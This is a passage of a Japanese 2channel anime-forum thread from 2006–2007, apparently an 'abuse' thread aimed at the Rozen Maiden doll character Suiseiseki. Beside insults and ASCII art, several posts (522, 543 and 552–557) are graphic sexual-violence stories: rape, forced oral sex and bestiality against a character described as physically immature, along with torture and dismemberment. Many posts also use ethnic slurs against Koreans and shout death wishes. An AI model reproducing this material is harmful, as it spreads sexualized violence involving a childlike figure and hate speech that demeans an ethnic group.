お前らの品性なんてたかが知れてるけどな、翠・基・地!

513 :名無しちゃん…電波届いた?:2006/12/14(木) 01:22:45
アンチスレに粘着するのが翠星石ファンの品性なのかよw
結局あんた達は自分の価値観を一方的に押し付けたいだけ
「好きなキャラが虐められるのが許せない」だ?我慢しろ

514 :名無しちゃん…電波届いた?:2006/12/15(金) 21:09:21
           ∧_∧____   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ___  (´∀` ,) //| < さて、10万円の問題です
    <──<\⊂ へ ∩)//|||   \__________
    \.  \,>'(_)i'''i~~,,,,/
──┐  ̄|| ̄(_) ̄~||~ ̄
    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
━━< 問題: 現 人 神 さんが、このスレにいる理由はどれ?        >━━
    \___________________________/
    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
━━< A:何となく              〉〈 B:熱烈なクソミドリ信者    >━━
     \____________/  \____________/
    / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\
━━< C:アンチローゼン        〉〈  D:単なる粘着厨          >━━
    \____________/  \____________/

515 :名無しちゃん…電波届いた?:2006/12/15(金) 22:11:52
>>505氏なら多分答えられると思う

516 :名無しちゃん…電波届いた?:2006/12/18(月) 19:53:11
えっと…いつも^^で書き込んでる者です。
最近は私情の為、中々覗ける機会が無かったもので。取り敢えず、>>514についてレスです。
これは私の私感ですが、最初はBだったけど、スレに通う内に
引っ込みがつかなくなって、Dの粘着厨になったのかと考えています。

はっきりした回答になってなくて、すいません。

517 :名無しちゃん…電波届いた?:2006/12/18(月) 20:06:11
>>516
現れたわね!!「!1根暗朝鮮人!!!!」!!
ずっと見張ってた甲斐があったってもんだわよほほほほほ!!!!!11「!
貴様に聖なる夜は迎えさせん!!!!!落ち着いてオーベルテューレは見させん!!!!!
必ずや!!「現 人神様と私の手で!!!!貴様を炭屑にしてやるぐぎゃぎゃぎゃぎゃぎゃwWWWWWwWWWwWWWW

518 :名無しちゃん…電波届いた?:2006/12/18(月) 20:22:36
オーベルテューレには翠星石出させてもらえないけどね。

519 :名無しちゃん…電波届いた?:2006/12/18(月) 21:35:36
>>517
安心するお、チョン君^^
オーベルテューレでちょっとでも糞翠が出てきたら、ここに真っ先に叩きに来てあげるお^^
ネタもたくさん用意しとくから、楽しみに待ってるお^m^

それはさておき、スィドリームを蛍と偽って虫屋に売っ払いたいお^^

520 :名無しちゃん…電波届いた?:2006/12/18(月) 21:50:37
>>517ぐぎゃぎゃぎゃぎゃぎゃwWWWWWwWWWwWWWW

どこのひぐらしだよってか見張ってたんだwホント収集つかなくなってんなぁ!

521 :名無しちゃん…電波届いた?:2006/12/21(木) 23:42:37
いよいよ明日か…

522 :名無しちゃん…電波届いた?:2006/12/22(金) 19:45:07
翠星石の留守中に蒼星石を料理して、練習から戻ってきた翠星石に食べさせる。
「とっても美味しいですぅ」と食べ終わったら、帽子を見せて種明かし。
ふだんの無表情が崩れ、涙を流しながら顔面蒼白で吐きまくる翠星石に
「美味しかった?ねぇ美味しかった?」と聞きまくり錯乱状態に追い込む。
すっかり打ちひしがれ、自失状態の翠星石の未成熟な肉体を蹂躙する。
さんざん弄んだ結果、糸の切れた操り人形のように身動きしない翠星石。
見開かれた目からは涙がとめどなく流れ、口からは涎を垂れ流す。
下腹部からは体液が今も滴り落ち、床に大きな染みを作っている。
そんな翠星石に「妹を食った悪い子にはお仕置しないといけないな」と
ロープでキツく縛り上げ、失禁するまで乗馬用の鞭でしばき続ける…
ショックのあまり、情緒不安定になり失語症になってしまった翠星石…
誤ってとはいえ、蒼星石を食べてしまった罪を問われ自宅に戻されてる。
泣きはらした目でとぼとぼ鞄に向かう翠星石を呼び止める。
翠星石の顔にさっと怯えが走りガタガタ震えだしたのが滑稽だ。
腕をつかむとビクッとしたが、さしたる抵抗も示さず路地に連れ込まれる。
そのワケは、パンツに突っ込んだ手の感触が教えてくれる。
粘液が糸を引く濡れた指を翠星石に見せつけ頬になすりつけた
壁に手をつかせ翠星石のスカートをまくり上げる。
染みができたパンツを下げ、濡れた蕾に触れる。
翠星石は観念したように身をまかせ、息を荒げている。
指を伝って雫が地面に滴り落ち、黒い染みを作っている。
「妹を食って、ローゼンメイデンを剥奪されたのに反省が足りないな」
翠星石が悲しげに呻くと同時に、蕾がキュッと指を締め付ける。
「いけない子にはお仕置きが必要だ」
ビクッと翠星石の華奢な身体が震え、身構えるように身体を固くする。
キツく締まった蕾から指を引き抜くと、小さな臀部をぐっと引き寄せた。

523 :名無しちゃん…電波届いた?:2006/12/23(土) 05:29:19
おはよう朝鮮人ども!!!!!!!1111!
いやーオーベルテューレは最高だったわ!1!!11!!!!!」
しょっぱなからいきなり翠ちゃん!!!!スタッフわかってるわね!!!!!!!!!11!!!1
枝豆剥いてる翠ちゃんも可愛かったわ!!!!!!「!!」!!
寝過ごして実況出来なかったのが残念だったけど!!11!!1!!!!1
あんたたちも今から翠ちゃん派に乗り換えれば?!!!!!!「」!!
あー明日も楽しみで仕方ないわよほほほほほほほほ!!!1!」!!!!!!!「!!!!11!!111!!!

524 :名無しちゃん…電波届いた?:2006/12/23(土) 11:54:31
>>523
皆がオーベル視聴後で疲れて寝てるだろう時刻に夜襲とは、いい度胸だおチョン君信者^^#
まぁ、おらも寝過ごしちゃったクチだから人の事言えないんだけどぉ^^;…

後編は寝過ごさないように頑張るお^^

どうでもいいけど、糞翠のあんよをスパイクついた靴で思いっきり踏み付けてあげたいお^^
ムカツクおムカツクおムカつくおムカツクおムカつくお^^#

525 :名無しちゃん…電波届いた?:2006/12/23(土) 12:46:44
オーベルテューレ前編感想

蒼星石の戦闘を邪魔した泣き虫害虫糞翠虫を心から破壊したいと思った。外野は黙ってればイーンダヨ糞翠!水銀燈と体交換してやれ!!…あ、でもやっぱジャンクソミドリの体じゃ水銀燈は不満か^^^^^^^

526 :名無しちゃん…電波届いた?:2006/12/23(土) 14:01:42
このスレの要注意人物↓

1.翠ちゃん=現人神wwww!!!!111 ◆wj7tW.6Gg

 かなり以前から各板の翠虐待スレに粘着していると思われるA級戦犯。
何故か朝○人を毛嫌いしていて、翠虐待スレの住民全般を「○鮮人」呼ばわりする困った人。
文章に!や1、「」を多用するのが特徴。最近はトリまで付け始めた。
また、頻繁に痛いタイプミスをする。 通称「現人神」


悪いけれど朝鮮人の暇をしている相手はないの!!!!永遠にさようなら!!!!!!

きちがいうんこはげ!!!!!!!!!!
翠ちゃんの肛門を下痢便から直飲みしたい!!!!!!

嗜好がおかしいわ!!!!11精神異常!!!!111デブス専!!!111だがら真紅厨は社会に順応できない!!!!11


2.名無しの現人神信者

 一時期、電波お花畑板が「人大杉」になった際に、突如として当時の
翠ちゃん=現人神wwww!!!!111 ◆wj7tW.6Gg.に成り代わって現れた。
現人神の危険思想に何故か共感を示している。これまでのレス内容から見て、たぶん女。
人大杉が解けてからは、現人神と一緒になってスレに粘着している。
一部では、現人神がパソコンと携帯を使って一人二役をしているという説も。
現人神を崇拝し、彼(?)の為に、スレに対する犯行予告までする徹底振り。
ただ、犯行予告までしておいてうっかり寝過ごす等、かなり間が抜けている。

527 :名無しちゃん…電波届いた?:2006/12/23(土) 14:34:10
>何故か朝○人を毛嫌いしていて

ここは「何故か真紅を毛嫌いしていて」に変えたほうがよいのでは?

528 :名無しちゃん…電波届いた?:2006/12/23(土) 14:56:48
>>527
そう?
朝鮮人を嫌ってる様なこと結構書いてたから、
これでも良いかなと思ったんだけど・・・。
まあ、「真紅嫌ってる」ってのも事実だし、それでもいいな。

翠ちゃん=現人神wwww!!!!111 ◆wj7tW.6Gg
何故か真紅を毛嫌いしていて、翠虐待スレの住民全般を「○鮮人」呼ばわりする。
よく「永遠にさようなら」と言っていなくなるけど、必ず粘着しに戻って来る困った人。

529 :名無しちゃん…電波届いた?:2006/12/24(日) 03:11:39
メぇぇぇ〜〜〜リぃぃぃぃクリっスマぁぁぁーーースぅ!!ひゃーーーはっはっはっはっはぁーーーっ!1!1!!!!!!
てめぇらの幸せを回収しに来ましたよほほほほほほほほ!1!1!」1!11!!!!!!!「!
さぁ!!「!!今日もオーベルテューレで翠ちゃんに萌えまくるわよほほほほほほほほ11!!!!1!!!1!」

530 :名無しちゃん…電波届いた?:2006/12/24(日) 03:17:04
>>529
来たお!チョン君信者が来たお><
頼むからオーベルテューレ視聴中は静かにしててくれお^^;

糞翠が出たからって発狂しちゃ駄目だお^^

531 :名無しちゃん…電波届いた?:2006/12/24(日) 03:22:34
>>530
うっせーぞ!!!!ボケ禿キムチ魔人が!!!1!!「!!11!11!!!!
つーかスタッフはなにやってんの!!!翠ちゃん出しなさいよ!!!!!!!!さあ!!!!早く!!!!!!!!

532 :名無しちゃん…電波届いた?:2006/12/24(日) 03:30:44
>>531
無理言うなお…つか、それ以前に今回の主役は水銀燈だお…^^;
糞翠が背景化するのは仕方ないお、我慢しろお^^#


糞翠と一緒に※キラ〇エア火山に行きたいお^^

んで、糞翠火口に落として帰って来たいお^^ノシ


※現在でも活動を続ける、ハワイにある活火山。


533 :名無しちゃん…電波届いた?:2006/12/24(日) 03:32:01
こんのぉ!!!111!!1!!!もうブチ切れたわ!!!!!!11!!この朝鮮人がぁあああああああああああ!111!1!1!!11!!!!
今すぐ死ねやぁあああああああああああああ!!!!!!!!!!!!!!!!!!!!!!!!!!!!

534 :名無しちゃん…電波届いた?:2006/12/24(日) 03:35:49
糞くらぇやああああああああああああああああああああああああああ!!!1!1!!!!!!11!1!
金正日の従属がああああああああああああああああああああああああああああ!!!!!!!!!!!!!!!!

535 :名無しちゃん…電波届いた?:2006/12/24(日) 03:38:51
>>533ー534
チョン君信者のおまんまんとチョン君の〇ニス結合させて
至高の基地外ベイビー作りたいお^^

…と思ったけど、駄目だお!危険すぎるお><
糞翠を超越するとんでもない生命体が誕生してしまうお;_;
この実験は中止だお><


536 :名無しちゃん…電波届いた?:2006/12/24(日) 03:42:20
うああああああああああああああああああああああああああああああ!!!!!!!!!!!!!!!!
くたばりやがれぇえええええええええええええええ!!!!!!!!!!!!!!!!!!!!!!!!!!!!

537 :名無しちゃん…電波届いた?:2006/12/24(日) 03:45:49
何これ!!!!!1!!1!!!!!翠ちゃんが殆ど出てこなかったじゃないのよ!1!11!!!!1!!!!!!
スタッフなにやってんのよ!!!!!!!!あほーあほー!!!!!!!!!!!!

538 :名無しちゃん…電波届いた?:2006/12/24(日) 03:50:47
>>537
あほはお前の方だお^^#
テレビも黙って観れないのかお、恥を知れお^^#



寝ている糞翠の入った鞄をヤフオクで売っ払いたいお^^
目が覚めた時には、目の前に落札者のチョン君信者がいて発狂するお^m^


539 :名無しちゃん…電波届いた?:2006/12/24(日) 03:54:49
キムチ魔人ども1!!!!!1!「!今日はこれくらいにしておいてあげるわ!!!1!11!!!!
私はもう翠ちゃんと一緒に寝るから1!1!1!1!11さようなら!!!!永遠に!1!1!!!!!!1「」

540 :名無しちゃん…電波届いた?:2006/12/24(日) 11:18:12
>今日はこれくらいにしておいてあげるわ

え?このスレに何か損害でも与えたつもりなんですか?教えてくださいよ!ねぇw

541 :名無しちゃん…電波届いた?:2006/12/27(水) 21:26:29
クソミドリ、オーベルテューレにてめでたく背景化記念叩き
         _,.-━━ュ-、   
         /,;;;;;;;;;;;;;;;;;;;;;;;;;,ヽ                          ,.-‐-、
        ,/,;;;;;;;;;;;;;;::::::::::::;;;;;;;;;;i!                        ,.''ゞ、*,;))
        j;;;;;;;;;;;;;;:r=-;;;;;ゞ;;;::ーヽ                     ,.ィ'    フ'"
       √,;;;;;;;;;;;;`;;;;;;;;ノ  ̄ 7`.:`)                  ,.え  ,.r''"
   _,.-─-、心彡'⌒`ー'" ,,_, ,ヘ-‐'"                ,. '  ,.-''
. /ヾ、 i! i| t`━-ェ、  :.   _r’        ,.r' ,.r''"
/へ\ヽ\l _,.__ゝl`゙ヾ_   ラ_       _,,...r',;;'√ヾ>_,.ィ",.*'"
!\ `ヽヾ j^;;;;;;;;;;;;,`ーュノ ) _ノ^A`vーェュ._,r'_,....{!^((⌒5てt-'
{!\\ヾフ;;;;;;;;;;;;;;ヽ;;;;;;,,ヽ ̄`ー=='' ̄. ,;,;,.7 . i!;:;入_^_;;ッ'     
ヘ\\ヽi!;;;;;;;;;;;;;;;;;;;,ヾ_.;;;;;;;;;;;;;;;;;;;;;;;;;;;; .rら ..ハミ)ゞ彡ソ 
 tヽヽヾヾ:;,ゝ、;;;゙、;;;;;;;;;;;;;;;;;;;;;;;;;;;;;ミ) -_,ァ二マ-ヽ_,/      
  マヘヽゝY`''-=,ニ,. -=-、.,.ン''^`T7 ̄r'_,,.-ゞン'        
  ヽヾヘヾv l | l j ^l i! 1 l! i | ! | ! r‐''                 。゜: ' 二ヽ> ,; '
   Y ゝヽヘ:l l | l | j! ∧ヾ7 い) l!                 .从∴, ;'イハ))` , .デズゥ
    ヽル、 い | l i! ! :|! l | イ !l / j !                ※;,ξ゚' iii.゚'ノ|∵  ・∵ ’ ,,・
     tl 1 i ヽゞ ! `i ヘ l | l !l! | l/ /ノ              "''''"Wノl_|つ介」つ` ; 、 ・ ・∵ ’ ,,・
     ヾj ヽ\ゝ lヽ亠,.━┓-r-、_lノノj                ≦ノ`ヽノヘ≧’。 ; ,  ・∵ ’ ,,・
      `l ヽゝ,.二`─┗━'┴L_人ミ/               ミく二二二ニ〉ミ ・∵ ’ ,,・
                                        ↑クソミドリwww

542 :名無しちゃん…電波届いた?:2006/12/28(木) 16:38:29

質問ですが

翠星石が来年の夏に公開される“終わらない夏休み(知らない人はググッてね)”に主演という形で出演するのは本当ですか?

もしそうだったら、美しくて抜ける拷問シーンが日替わりで見られるから楽しみだなぁw
あ、でも最後はあぼーんしちゃうから意味ないかww

543 :名無しちゃん…電波届いた?:2006/12/29(金) 14:46:51
>>542
ググってみたら、ワラタw
もしそうなったら、正に大歓迎ですね^^


糞翠を全裸にして雪がちらつく寒空の下に放り出したいお^^

「入れて、(家の)中に入れてですぅ・・・・」と泣きながら懇願する糞翠^^

お望みどおり中に入れてあげるお〇(≧▽≦)〇
処女ま〇こにちん〇ねじ込まれて泣き叫ぶ糞翠^m^

544 :名無しちゃん…電波届いた?:2006/12/29(金) 17:47:39
(翠星石についてどう思われますか?)


翠星石?あぁ、何かと僕を付け回してるキチガイストーカーの事ね。僕の姉?一体何の話?

こないだなんか僕に説教垂れた上に拘束しやがって、一体何様なんだろうね。それにバカって……そのまま倍にしてアンタに返してやるよって感じ。
その上人様に迷惑かけるし、あの人を何度も殴るし口も悪いし……一体何回レンピカでズタズタに切り刻んでやろうと思った事か……。本当あんなの生きてて恥ずかしくないのかな?

あースッキリしたw

By PN.ブルーのカズキ

お粗末。

545 :名無しちゃん…電波届いた?:2006/12/31(日) 23:45:22
ふー、今年もなんとか無事に年が越せるようで何よりです^^
来年もよい年でありますように。
というわけで、2006年度最後のカキコ

糞翠をファイヤーデスマッチで黒焦げにしてやりたいお^^
どっかの黒人みたいに秒殺してあげたいお^m^


546 :名無しちゃん…電波届いた?:2007/01/01(月) 00:14:11
連投になりますが、新年の初カキコ
明けましておめでとうございます^^

新年を糞翠のワ〇メ酒でお祝いするおヽ^^ ノ

顔には書き初めで「バカ」って書いてあげたいお^^

547 :名無しちゃん…電波届いた?:2007/01/01(月) 01:35:51
>>546
今年も糞翠虐待をよろしくお願いします。

548 :名無しちゃん…電波届いた?:2007/01/01(月) 01:57:26
>>547
はい、謹んでお引き受けいたします^^

549 :名無しちゃん…電波届いた?:2007/01/01(月) 02:01:12
最近、現人神見ないな。

550 :名無しちゃん…電波届いた?:2007/01/01(月) 12:43:40
それはそれで平和でいいじゃないですか。

551 :名無しちゃん…電波届いた?:2007/01/05(金) 02:19:59
                                    ___
                                  く/',二二ヽ>
.                                  |l |ノノ。イハ))  ;*∵,
           うゅ?                  rノl_|(#)々゚ノl| ';∴+
 _,,,...... . . ----------- .....,,,,_                ≦〉#介」(つ≧
/――r''''"~~~「_,.'- ,',i><iヽ ̄~`;、        ガッ ミ⊂二二二〉  ミ
    ;!     ヽi /((ノノリノ))    ':;            /し´
..,,__,;!..........(ニi.,ノレ((ミi!゚ ヮ゚ノミ)).............,)}...,,,_       ///
   /-    ゙゙:,       ,,._      ̄`,;r-、__人///
,   i       :,      (::::)r;:=====i、.,;! )   て
i:!   :       ,:'"三ミ:、   ,','(::):;:;:;:;:;:;:;(::):|`ヽ,  (
|ゞ- ..;,,,,,, ____ _,!:;;r'~`;,:ゞr---ゞ_ニr仮免i=) '⌒´`
!:;;リ  ̄~~~`'''''―' :;|  リ;;;;;!二二..,,,,,,,,:!---',,;:;:;!
'''"          ヾニ"::ノ        `''''''''"

552 :名無しちゃん…電波届いた?:2007/01/09(火) 21:05:38
夜遅く、ようやく仕事が終わり家に帰る。最近残業の日が続いたので、もうクタクタだ。
早く飯が食いたい。やっと家に着き、玄関を開けた。すると…
俺一人しか住んでいないのに、奥の部屋に明かりがついているではないか。
俺「あれ?おかしいなぁ。家を出るとき、たしかに消したはずだ」
まさか泥棒が入ったのか?と思いつつ下駄箱の上に置いてある傘を手に取り、奥の部屋の方へゆっくり進んだ。
俺「誰かいるのか!」
ついに俺は奥の部屋の中に入った。しかし、部屋が荒らされた痕跡は無く、人の気配も無かった。
俺は単に電気を消したと思い込んで消し忘れただけかと思った。が、しかし…
俺は窓ガラスが割られていることに気づいた。穴が開いている。
俺「何だ…?とてもじゃないが、この穴は人間が通れるってほどの大きさじゃねえな…」
不審に思った俺は、とりあえず110番しようと電話の方に向かった。すると、
俺「ゲッ!?何だコレ!?」
なんと、そこには薄汚れた緑色のドレスに身を包んだ、変な人形が横たわっているではないか。
俺「お…おいおい何だよこの人形、気味が悪ィなぁ。やっぱ誰かが家に入ってきたのか?これはそいつの落し物とか…?」
俺はその人形を手に取って、よく見てみた。閉ざされた口は、なぜか食べ物のような匂いがする。
と、突然、人形が閉じていた目をカッと開いた。そして次の瞬間、
人形「きゃああ!どこ触ってんですか、このスケベ野郎!」 パチンッ!
俺は人形に思いっきりビンタされた。俺がひるんだ隙に人形は床に飛び降りた。
俺「ぎ、ぎゃああああ!人形が、う、動いたァ!…い、痛ぇ〜」
人形「うるさいですぅ人間。この翠星石の許可も無く体を触ろうなんて、ムシが良すぎるですぅ。お前は誰なんです?」
何だこいつ…人様の家に勝手に寝てたくせに俺を誰だと…?ムカつく奴め。
俺「お、俺はここの家のモンだ!…お前か?ガラス割って家に入ってきたのは!」
俺は、自分を翠星石と名乗る人形に聞いてみた。
翠「そうですけど?」
翠星石は、どうしてわかったようなことを聞くの?というような感じの表情で答えた。
この態度が俺をさらに腹立たせた。

553 :名無しちゃん…電波届いた?:2007/01/09(火) 21:07:22
翠「前の私の持ち主…ダメ人間が、良い子の私を一発殴った挙句、私を家の外に追い出しやがったんですぅ。
私の他にも人形はいたけど、私だけ追い出したんです。まったく酷い話ですぅ、私が一番かわいいのに。
 で、私しばらく食べ物を食べてなかったから…つい、失敬したですぅ」
俺「な、何だって…?」
翠星石の言葉を聞いたとき、嫌な予感がした。俺は冷蔵庫の扉を開け、中を見た。そこには信じられない光景が…
俺「う、嘘だ…そんな…何も無いじゃないか…」
なんと、冷蔵庫の中が空っぽになっているではないか。もともと少なかったとはいえ貴重な食料が殆ど全滅…。
俺「おい!てめえが食ったのか!?」
翠「そうですよ。ちょっとマズかったけど翠星石は良い子だから好き嫌いなんてしないのですぅ。
ゴミはちゃんとゴミ箱に捨てておいたから安心するです。私に食べてもらったことに感謝しやがれです、人間。…ゲェップ!」
すぐに飯にしようと思っていたのに、こいつに…こんな人形に俺の食料を食われた…俺はショックのあまり座り込んでしまった。
しかも、奴がゴミを捨てたのはゴミ箱ではなく、俺の机の引き出しだ。俺の大切なものが色々と閉まってあった場所…
翠「あ、そうだ。私、ここに居候することに決めました。というわけで、よろしくですぅ」
俺「…!!」
突然、俺は何を思ったか、こいつの体を両手で鷲署ルみにした。
翠「あっ…!?な、何しやがるですか!?く、苦しいですぅ〜!離せですぅ〜!」
俺の手から逃れようと翠星石は必死に抵抗するが、俺が力いっぱいに握り締めているので無駄だった。
翠「私…何も悪いことなんかしてないですぅ!さっさと離しやがれですぅ、ブサイク!」
俺「何ィ〜!」
俺はついにキレた。そして…。 ガツンッ!
翠「きゃあああっ!」
手に持っていた翠星石を思いっきり床に叩きつけた。
腰から落ちたようだ。痛みを感じているらしい。…フン、人形のくせに。
フラフラしながら立ち上がった。今の衝撃でかなりのダメージを受けたのか、翠星石の動きが鈍くなったようである。

554 :名無しちゃん…電波届いた?:2007/01/09(火) 21:08:45
翠「あうう…、ひ…酷いです、痛いですぅ…。お、お前も…ダメ人間なのですぅぅ」
何で俺がこんなキモイ奴に、ダメ人間呼ばわりされなければならんのだ?
こんな人形ごときにっ…!
俺の怒りのボルテージが上がってきた。こんな奴、壊してやる!
俺「この食い物泥棒がぁっ…!くらいやがれぇっ!!」
怒りにまかせ、翠星石を思いっきり蹴った。奴は壁に勢いよく衝突した。
翠「く…うう…よ、よくも…やりやがったですねぇ…!もう…許さないですよ…!」
さっきよりも弱っている。翠星石は立とうとしたが、今度は床に倒れこんだ。
俺はこの隙に、片手でサッと翠星石の体を床に押さえつけ、もう片方の手で果物ナイフを手に取り翠星石に突きつけた。
翠「ひゃっ!?な、何をするですか!?馬鹿な真似はよしやがれですぅ〜!ゆ、許してやるから…」
俺「ああ?許してやるだと?てめえ何様のつもりだ?生意気なんだよ糞人形!くたばれ!」
顔面に刺そうと、ナイフを振り下ろした。が、その瞬間、翠星石が残った力を振り絞って暴れた。
俺「おわっ!?」 ブスッッ!
翠「!? きゃああああ!!」
手がすべり、ナイフは翠星石の顔面ではなく緑色のドレスを貫き、股間に刺さった。
もともと股間の穴までは作られていなかったようだが、今ので立派な縦筋ができてしまった。
ナイフを抜いても、人形なので血は出ない。代わりに透明なドロッとした液体が出てきた。
俺「アッハハハハ、あ〜らら。動かなきゃ一発で死ねたのになぁ。バカな奴」
翠「あ…ああうぅ…」
横たわっている翠星石は大粒の涙をこぼしながら、股間を両手で押さえている。
その様子はまるで、ピッチャーの投げたボールが急所に当たった時のバッターのようだ。
しかしこの光景、面白いというよりはむしろ見苦しい。足をくねらせ始めた。う〜わ、キモイ。
さっさと食い物泥棒にトドメを刺そうと再びナイフを構える俺。ところが…

555 :名無しちゃん…電波届いた?:2007/01/09(火) 21:09:55
翠「うう…やめてほしいですぅ…助けてですぅ…」
俺「フン、人形のくせに命乞いか?安心しろ、今楽にしてやるからよ」
翠「な、何でもするから…あなたの言うことを聞いてあげますから…もう痛いのは嫌…」
俺「…ほ〜う?何でもか?」
俺はいいことを思いついた。せっかくだから、壊す前にこいつでちょっと遊んでやろう。
最近仕事が忙しく暇な時間が無くて、溜まっていたことだしな。
俺「おいクズ。さっそくお前に命令してやる。俺のこいつをしゃぶるんだ」
俺はそう言うと、ソファーに座り、ズボンのファスナーを下ろしてペニスを引っ張り出した。
翠「え…?い、嫌あ…!そ、そんなの…舐めれるわけないじゃないですかぁ…!」
泣きながら顔を赤らめている。顔の色が変わるとは…一体どういう構造をしているんだ?
躊躇している翠星石に、テーブルの上に置いてあった物をこれでもかこれでもかと投げつけた。
俺「さっさとしろや!何でもするって言っただろうが!殺されてえのか!」
翠「い、痛い、痛いぃ…!わ、わかりましたですぅ…!な、舐めますから…やめて…」
涙で顔を濡らしながらそう言うと、翠星石は座っている俺のところまで這いながら近づいてきて、小さな舌の先で俺のペニスを舐め始めた。
チロ、チロ…
俺「…ちっ。そんなもんで、俺が満足するとでも思ってんのかタコ!」
あまり気持ちよくないので、きついゲンコツを1発、奴の頭にお見舞いした。頭を抱えてしゃがみこむ翠星石。
翠「…うっ…えっぐ…体のあっちこっちが痛いですぅ…に、人間なんて…大嫌い…ですぅ…」
俯いてポタポタと涙を零す翠星石の鼻に、俺はペニスの先っぽをグリグリと押し付けた。
知らないうちに俺はこいつを痛めつけるのが、段々と面白くなってきていたようだ。
翠「うぶっ…く…くさっ…変なにおいがするですぅ…」
もう1発、奴の頭を殴った。
俺「さっきよりは丁寧にしゃぶれよな。死にたくなかったらなあ…!」
すっかり怯えきっている翠星石。今度は完全にペニスを口に含もうとした。
と、同時に俺は翠星石の小さな口の奥へ突っ込んだ。

556 :名無しちゃん…電波届いた?:2007/01/09(火) 21:10:58
翠「んぐぅっ!?ぐ、ぐるじぃ…でずぅ…んう…じゅぶ…ぶちゅ…」
中に入れてみると意外に気持ちがよかった。俺は無意識に翠星石の頭を抱え、無理やり前後に動かした。
そして、オルガスムスに達する一歩でペニスを口から抜き、翠星石の顔やドレスにドロリと濃い白濁液をぶっかけた。
久しぶりの射精だったので、量も多い。
翠「う゛ぅっげほっげほっ、うぇぇっ…ネトネトしてて…ばっちいですぅ…ひっぐ…くさいです…あんまりですぅ〜う…」
上から下まで精液まみれになって泣いている翠星石を見て、一度射精したにもかかわらず、俺の勃起したペニスはさらに硬さを増した。
う〜む、こんな人形ごときに…。我ながら情けない…。
ふと、俺の目は、さっきナイフを刺したことによってできた翠星石の股間の割れ目にいった。
まだ液体が割れ目から少しずつ流れ出ている。
…よし。
俺は翠星石の脚を強引に開かせた。
翠「こっ…今度は何を…」
俺は息を荒げ、黙ったまま翠星石の割れ目にガチガチになったペニスを一気に奥まで挿入した。
翠「ヒギィ!!痛いですぅぅ!!い…いやああああああああっ!!」 ズニュッジュブッズチュッ…
奴の悲鳴はやかましいが、その悲鳴が俺を興奮させピストン運動をさらに加速させる。
ドロリとして生暖かい謎の液体がペニスに絡みつき、口でしてもらった時とはまた違った快感が押寄せる。
俺のムスコはまたかなりの量の精液を、翠星石の体内に吐き出した。
どうやら、ムスコはやっと柔らかくなりそうだ。
翠星石はというと、すでに意識が無くなり、透明な液体の水溜りの中に倒れていた。というより、もう魂が抜けてしまったようだった。
あまり汚さなかったら、もう一度くらいは性欲処理に使えたかもしれないな、と思いつつ、
俺は抜け殻となった翠星石をゴミ箱に捨て部屋の中を掃除して、夜食を買いにコンビニへ向かうのだった。

557 :名無しちゃん…電波届いた?:2007/01/09(火) 21:12:00
ゴミ箱の中で意識を取り戻した精液まみれの翠星石は、残された少ない力でゴミ箱から這い出て、
自分を汚した男が家に帰ってくる前に何とか窓ガラスの穴から外へ脱出した。
いつの間にか涙は枯れていた。体中が激しく痛み、満足には動けない。
それでも、少しでも自分にとってマシな場所に辿り着けるよう、這いながら進んでいった。
途中、疲れのあまり、消化しきれていない食べた物を吐き出してしまった。
そのニオイに釣られたのか、オスの野良犬の群れが翠星石のまわりに集まり、取り囲んだ。
翠星石はそれが危険な状況だということがすぐにわかった。
「きゃあああ…!こっちに来るなですぅ…だ、誰か助けてですぅ〜…!」
悲鳴をあげる。しかし、無駄だった。翠星石を助けに来る者などいない。
野良犬は一斉に翠星石に襲い掛かった。ドレスが引き裂かれ、腕が、足が次々と噛みちぎられる。
そして翠星石は体の穴という穴に、性器を突き立てられた。
数分後、そこには犬の姿は無く、バラバラにされ真っ白に染められた翠星石の残骸だけが残されていた…。
「…あうう…えぐ…なんで…なんで私だけ…」

558 :お久しぶりです^^:2007/01/12(金) 17:33:36
http://isp.2ch.net/close.html

2ちゃんねるプロバイダー サービス終了のお知らせ
いつも「2ちゃんねるプロバイダー」をご利用下さいまして誠にありがとうございます。
2003年 5月のサービス開始時より、大変多くのみなさまにご利用いただいて
参りました、「2ちゃんねるプロバイダー」サービスを、
誠に勝手ながら2007年 1月15日 にて終了させていただくこととなりましたので、
お知らせいたします。


しばらく2ちゃんから離れてたら、何だか大変なことになってるお…;_;
もうこうなったら…こうなったら…




残り三日間で、思う存分糞翠虐待しまくるしかないおwwwwwwwwwwwwwwww


嫌がる糞翠をフロリダの沼地に強制ダイブさせてそのまま沈めたいお^^

注意:フロリダの沼地には、糞翠の大好きなワニがたくさんいます
糞翠 GOOD LUCKだお^^b

559 :名無しちゃん…電波届いた?:2007/01/12(金) 21:38:27
>>558
なんか大変なことになってますね・・・。ネット界全体に影響を与えますよこれは。

おいピーマン!
「なんで翠星石がピーマンですか!翠星石はピーマンじゃないですぅ!」
緑色で中身カラッポだからピーマンだ!今日からてめえはピーマンだ!
てめぇの鞄にも「ピーマン」って彫ってやったぜ!感謝しろ!
「ひひひひどいですぅ!翠星石の鞄があ」
朝になってまた鞄が開いた
「おはよ〜ですぅ!」
すぱ――んっ!!
俺はナタで出てきた翠星石を唐竹割に真っ二つにしてやった。
次の日の朝また鞄が開いた
「おはよ〜ですぅ!」
ドシャッ!
俺はマサカリで翠星石の首を切り飛ばした。
次の日もまた鞄が開こうとした
「おはよ...???か、鞄が開かねーですぅ!」
俺は事前に呼んでいた廃品処理業者の車の後ろに鞄を他の廃品と一緒に放り込んだ
うぃ――ん...グシャドシャ―ッ!
他の廃品と一緒にペチャンコになっていく鞄を見届けると俺は家に帰った。
玄関を開けたらそこに鞄があった。
鞄が勢いよく開く
「おはよ〜ですぅ!」
...呪い人形め!

560 :名無しちゃん…電波届いた?:2007/01/13(土) 09:19:47
>>559
そうですね…。
今はただ、この事態の沈静を望みながら、2ちゃんの行く末を
見守るくらいしか出来ないのが残念です…

糞翠の目玉使ってビリヤードやりたいお^^


561 :連投だけど:2007/01/14(日) 20:45:51
糞翠の腹を金属バットでバシバシ叩きたいお^^
泣きわめこうがお構いなしだお^^


